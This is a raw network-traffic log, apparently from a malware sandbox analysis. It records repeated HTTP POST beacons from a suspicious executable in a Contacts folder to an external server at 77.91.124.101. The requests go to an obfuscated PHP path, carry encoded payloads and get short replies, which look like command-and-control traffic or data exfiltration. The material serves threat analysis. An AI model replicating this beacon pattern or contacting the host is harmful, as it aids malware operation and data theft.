Nov 21, 2023 04:48:06.281907082 CET	404	OUT	Data Raw: 57 59 58 5a 5e 5e 5a 5e 5d 57 55 57 55 5a 57 5a 50 5d 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXZ^^Z^]WUWUZWZP]XHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8=<;0;/7Z7:+ ='%33"T-;">?(->&G''^)7
Nov 21, 2023 04:48:06.485061884 CET	405	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	77.91.124.101	80	192.168.2.5	49775	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:06.802329063 CET	406	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:07.001066923 CET	406	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:07.001455069 CET	409	OUT	Data Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
Nov 21, 2023 04:48:07.205137968 CET	409	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.5	49775	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:06.802329063 CET	406	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:48:07.001066923 CET	406	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:07.001455069 CET	409	OUT	Data Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
Nov 21, 2023 04:48:07.205137968 CET	409	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.5	49776	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:07.523130894 CET	410	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:07.720772028 CET	410	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:07.721007109 CET	413	OUT	Data Raw: 52 5a 5d 5b 5b 53 5f 5c 5d 57 55 57 55 5b 57 5b 50 5a 58 45 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ][[S_\]WUWU[W[PZXEVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'-_<;=>+^8&Z7\?0"Q&-1$ :W-;&]((8.&G''^)3
Nov 21, 2023 04:48:07.924458981 CET	413	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	77.91.124.101	80	192.168.2.5	49776	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:07.523130894 CET	410	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:07.720772028 CET	410	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:07.721007109 CET	413	OUT	Data Raw: 52 5a 5d 5b 5b 53 5f 5c 5d 57 55 57 55 5b 57 5b 50 5a 58 45 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ][[S_\]WUWU[W[PZXEVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'-_<;=>+^8&Z7\?0"Q&-1$ :W-;&]((8.&G''^)3
Nov 21, 2023 04:48:07.924458981 CET	413	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.5	49777	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:08.237934113 CET	414	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:08.439186096 CET	414	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:08.439804077 CET	417	OUT	Data Raw: 52 5b 5d 5d 5b 59 5f 5b 5d 57 55 57 55 5b 57 54 50 58 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]][Y_[]WUWU[WTPXX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+.+9?07.4%4!+#.Q&=V'#%.]<,,.&G''^)3
Nov 21, 2023 04:48:08.642436981 CET	417	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	77.91.124.101	80	192.168.2.5	49777	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:08.237934113 CET	414	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:08.439186096 CET	414	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:08.439804077 CET	417	OUT	Data Raw: 52 5b 5d 5d 5b 59 5f 5b 5d 57 55 57 55 5b 57 54 50 58 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]][Y_[]WUWU[WTPXX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+.+9?07.4%4!+#.Q&=V'#%.]<,,.&G''^)3
Nov 21, 2023 04:48:08.642436981 CET	417	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.5	49778	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:08.956479073 CET	418	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:09.155344963 CET	418	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:09.155574083 CET	421	OUT	Data Raw: 52 5f 58 5e 5e 5a 5a 5d 5d 57 55 57 55 59 57 5b 50 5a 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X^^ZZ]]WUWUYW[PZXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)[?T>#3\/._#)+U5'>Q&3-.+<;];>&G''^)
Nov 21, 2023 04:48:09.359371901 CET	421	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	77.91.124.101	80	192.168.2.5	49778	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:08.956479073 CET	418	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:09.155344963 CET	418	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:09.155574083 CET	421	OUT	Data Raw: 52 5f 58 5e 5e 5a 5a 5d 5d 57 55 57 55 59 57 5b 50 5a 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_X^^ZZ]]WUWUYW[PZXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)[?T>#3\/._#)+U5'>Q&3-.+<;];>&G''^)
Nov 21, 2023 04:48:09.359371901 CET	421	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.5	49779	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:09.674050093 CET	422	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:09.870726109 CET	422	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:09.871032000 CET	424	OUT	Data Raw: 52 5a 5d 5b 5b 5e 5f 5a 5d 57 55 57 55 59 57 51 50 5d 58 41 56 5e 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ][[^_Z]WUWUYWQP]XAV^W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+81<.S*3\8:[7:)0"S'=!'-.(%>/ ,&G''^)
Nov 21, 2023 04:48:10.072663069 CET	425	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	77.91.124.101	80	192.168.2.5	49779	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:09.674050093 CET	422	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:09.870726109 CET	422	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:09.871032000 CET	424	OUT	Data Raw: 52 5a 5d 5b 5b 5e 5f 5a 5d 57 55 57 55 59 57 51 50 5d 58 41 56 5e 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ][[^_Z]WUWUYWQP]XAV^W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+81<.S*3\8:[7:)0"S'=!'-.(%>/ ,&G''^)
Nov 21, 2023 04:48:10.072663069 CET	425	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.5	49780	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:10.395653963 CET	426	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:10.593367100 CET	426	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:10.593626022 CET	428	OUT	Data Raw: 57 5c 58 50 5e 5e 5f 5e 5d 57 55 57 55 56 57 55 50 5c 58 44 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP^^_^]WUWUVWUP\XDVUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y+(%^<"R=#\,:^ )Y?=3-.V33&R-;>/8;&G''^)
Nov 21, 2023 04:48:10.796176910 CET	429	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	77.91.124.101	80	192.168.2.5	49780	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:10.395653963 CET	426	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:10.593367100 CET	426	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:10.593626022 CET	428	OUT	Data Raw: 57 5c 58 50 5e 5e 5f 5e 5d 57 55 57 55 56 57 55 50 5c 58 44 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W\XP^^_^]WUWUVWUP\XDVUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y+(%^<"R=#\,:^ )Y?=3-.V33&R-;>/8;&G''^)
Nov 21, 2023 04:48:10.796176910 CET	429	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.5	49781	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.114900112 CET	430	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.311685085 CET	430	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:11.312056065 CET	432	OUT	Data Raw: 57 59 58 59 5b 59 5a 51 5d 57 55 57 55 59 57 50 50 5a 58 43 56 52 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYXY[YZQ]WUWUYWPPZXCVRWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)5<(%)U4;-4:=<0=&-2S&0.:X>,/_/>&G''^)
Nov 21, 2023 04:48:11.513534069 CET	433	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	77.91.124.101	80	192.168.2.5	49781	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:11.114900112 CET	430	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:11.311685085 CET	430	IN	HTTP/1.1 100 Continue
